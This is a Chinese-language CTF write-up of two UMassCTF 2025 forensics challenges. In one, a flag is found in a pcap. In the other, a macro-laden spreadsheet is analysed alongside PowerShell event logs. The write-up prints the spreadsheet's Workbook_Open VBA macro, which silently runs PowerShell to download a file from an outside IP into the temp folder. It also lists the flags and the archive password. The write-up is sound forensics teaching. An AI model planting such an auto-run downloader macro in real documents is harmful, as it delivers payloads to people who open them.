比赛地址：UMassCTF 2025

比赛时间：19 Apr 2025 02:00 CST - 21 Apr 2025 08:00 CST

复现的题目用🔁标注

Forensics

No Updates

Challenge

No Updates

I don’t believe in updating my computer, it just takes so long! Besides, no one could ever hack me, I use good passwords!

Files:

chall.pcapng

Solution

wireshark 打开直接搜

flag

🚩UMASS{n07_ag41n_d4mn_y0u_m3t4spl017}

Macrotrace

Challenge

Macrotrace

A suspicious spreadsheet surfaced from the archive of a defunct Flash game studio. Opening it does… something, but whatever was there is now gone.

Your mission: reverse the macro, trace what it did, and recover the flag it tried to destroy.

Use 23ab3Y9/]jKl as the password when extracting the password-protected zip archive.

Files:

macrotrace-assets.zip

Solution

附件有 dropper.xlsm 和 flash.evtx

先打开 dropper.xlsm ，dropper.xlsm 是一个包含宏的 Excel 文件，宏可能执行了某些恶意操作，所以先尝试提取并分析其中的 VBA 代码

在 Excel 中，按 Alt + F11 打开 VBA 编辑器

vbscript

1Private Sub Workbook_Open()2    Dim cmd As String3    cmd = "powershell.exe -Command ""Invoke-WebRequest -Uri 'http://34.138.121.94:8000/stage1.txt' -OutFile $env:TEMP\stage1.txt"""4    Shell cmd5End Sub

可以发现这里下载了 http://34.138.121.94:8000/stage1.txt ，并将其保存到 $env:TEMP\stage1.txt 中

手动访问 http://34.138.121.94:8000/stage1.txt ，响应如下

text

1Temporary file removed.2Powershell execution details may still be... recoverable. 3-- Saved in Unicode

看来接下来就得分析 flash.evtx 了

flash.evtx 是 Windows 事件日志文件，可能记录了宏执行时的操作痕迹

flash.evtx 的内容全是事件 ID 为 4104 的记录，事件 ID 4104 表示 PowerShell 脚本块的日志记录，因此我们可以通过解析这些日志还原出曾经运行的 PowerShell 脚本内容

一条条翻，发现了这条很可疑的记录

text

1VU1BU1N7ZHJvcF9pdF9saWtlX2l0c19ob3R9

base64 解码之后就是 flag 了

flag

🚩UMASS{drop_it_like_its_hot}